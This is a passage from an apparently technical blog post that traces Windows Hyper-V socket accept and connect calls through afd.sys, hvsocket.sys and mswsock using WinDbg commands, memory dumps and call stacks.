<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IoIs32bitProcess, next ObReferenceObjectByHandle (Handle – 0x148), then a pointer to AfdDeviceObject (0FFFFDA8527DE29D0h) is loaded into rax:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!devobj 0FFFFDA8527DE29D0h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device object (ffffda8527de29d0) is for:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Afd \Driver\AFD DriverObject ffffda8527de19c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Current Irp 00000000 RefCount 85 Type 00000011 Flags 00000050</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Dacl ffffcb8a7e8ccd11 DevExt 00000000 DevObjExt ffffda8527de2b20 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ExtensionFlags (0x00000800) DOE_DEFAULT_SD_PRESENT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Characteristics (0x00020000) FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device queue is not busy.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The field at offset +8h in the _AFD_CONNECTION structure is compared with AfdDeviceObject. Next nt!KeAcquireInStackQueuedSpinLock and afd!AfdGetReturnedConnection. Result (in rax):</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`298e7ac0 0002</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd8</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00061000 28bf3e40 ffffda85 ........@>.(....</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`298e7ad0 28fa1180 ffffda85 db95c080 fffff803 ...(............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`298e7ae0 27121080 ffffda85 17d0e6d1 00000019 ...'............</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then afd!AfdAcceptCore (1st parameter is the IRP):</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd @rdx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`29b80860 0002afd0 01000000 00000100 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`29b80870 297cf380 ffffda85 db95c048 fffff803</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd @r8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`298e7ac0 0002afd8 00061000 28bf3e40 ffffda85</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`298e7ad0 28fa1180 ffffda85 db95c080 fffff803</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Inside the function: nt!KeAcquireInStackQueuedSpinLockAtDpcLevel, then afd!AfdSetupAcceptEndpoint (only nt!ExFreePoolWithTag is executed), next nt!KeReleaseInStackQueuedSpinLockFromDpcLevel; return to afd!AfdAccept: nt!KeReleaseInStackQueuedSpinLock, then afd!AfdDerefTLBaseEndpoint and afd!AfdTLCloseEndpoint, and hvsocket!VmbusTlCommonProviderCloseEndpoint is called; next is hvsocket!VmbusTlQueueEndpointAction, which queues the work item hvsocket!VmbusTlEndpointActionWorkQueueRoutine using netio!NetioInsertWorkQueue. Then hvsocket!VmbusTlCommonProviderCloseEndpoint returns 103h. Next afd!AfdTlDereferenceTransport is called (WskTdiTransport was checked; I saw a zero value during tracing). netio!NmrClientDetachProviderComplete may be called. Return to afd!AfdAccept, next nt!ObfDereferenceObject and nt!IofCompleteRequest. We leave afd.sys.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After some time hvsocket!VmbusTlEndpointActionWorkQueueRoutine will be executed. hvsocket!VmbusTlCommonEndpointCleanup is called from it, next afd!AfdTLCloseEndpointComplete (we can see a DbgPrint call with the message 'Failed to close TLI endpoint! Status=%lx, AFD endp=%p'; we rarely see this in the Windows kernel, WPP is usually used instead). The 2nd parameter is not zero and therefore we go to afd!AfdDereferenceEndpointInline, then return to hvsocket.sys. Next hvsocket!VmbusTlEndpointDestructor, then nt!PsReturnPoolQuota and nt!ObfDereferenceObject (for the ServerExample.exe process object). We can see work with the VmbusProviderContext variable:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dps VmbusProviderContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0b8 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ffffda85`27f6ba80</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0c0 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0c8 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0d0 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0d8 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0e0 00000000`00040001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0e8 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0f0 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0f8 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e100 ffffda85`27f2c0b0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e108 ffffda85`27f2c0b0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e110 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e118 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e120 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e128 fffff803`db95c260 hvsocket!WPP_ThisDir_CTLGUID_HvSocketTraceGuid</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e130 00000000`00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dps 0FFFFDA8527F6BA80</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6ba80 00000000`00000006</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6ba88 00000000`00000009</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6ba90 00000000`00000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6ba98 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6baa0 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6baa8 00000000`00060001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bab0 ffffda85`27f6bab0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bab8 ffffda85`27f6bab0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bac0 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bac8 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bad0 fffff803`db951e50 hvsocket!HvSocketProviderDestructor</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bad8 00000000`00000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bae0 ffffda85`27f6b9a0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bae8 ffffda85`27f6b8c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6baf0 fffff803`db32d160 afd!AfdTlClientDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6baf8 00000000`00000001</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlEndpointWorkQueueDestructor is queued via netio!NetioInsertWorkQueue; control then goes from hvsocket!VmbusTlEndpointDestructor to netio!NetioInsertWorkQueue and on into the Windows kernel…</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next we return to mswsock!WSAAccept; mswsock!SockNotifyHelperDll is called next, and then mswsock!SockCoreAccept.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">wshhyperv!WSHGetSocketInformation is called three times, then wshhyperv!WSHGetSocketInformation once more, and then mswsock!SockUpdateWindowSizes.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mswsock!SockGetTdiHandles is called, which leads to an ntdll!NtDeviceIoControlFile call:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 148 File (---) \Device\Afd)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, 00F6F424</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 00012037 (AfdDispatchImmediateIrp)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer, </span><span style="background-color: transparent; color: #0070c0; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00F6F5D8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength, 0xC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><ol start="5" style="margin-bottom: 0pt; margin-top: 0pt;"><ol start="5" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -36pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Connect</span></div>
</li>
</ol>
</ol>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The server is ready to accept incoming connections, so now we will consider the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">connect</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> call, which is made from the client. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">From ClientExample!Connect, ws2_32!Prolog_v2 runs, then ws2_32!WahReferenceContextByHandle (it receives 144 as the descriptor, the handle to \Device\Afd). Next </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">mswsock!WSPConnect</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> is called, from which </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">mswsock!SockDoConnect</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, then </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">mswsock!SOCK_SQM_INFO_CAPTURE__NonCore_WSAConnect</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, then </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">wshhyperv!WSHGetWildcardSockaddr </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(returns wshhyperv!HV_GUID_ZERO), then mswsock!WSPBind, from which wshhyperv!WSHGetSockaddrType is called.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>k – bind from connect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ChildEBP RetAddr </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036f478 7203873c ntdll!NtDeviceIoControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036f530 7204dab6 mswsock!WSPBind+0x1cc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036f5c0 7204e3af mswsock!SockDoConnect+0x2c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036f5dc 75de4d76 mswsock!WSPConnect+0x1f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036f62c 002611df WS2_32!connect+0x86</span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
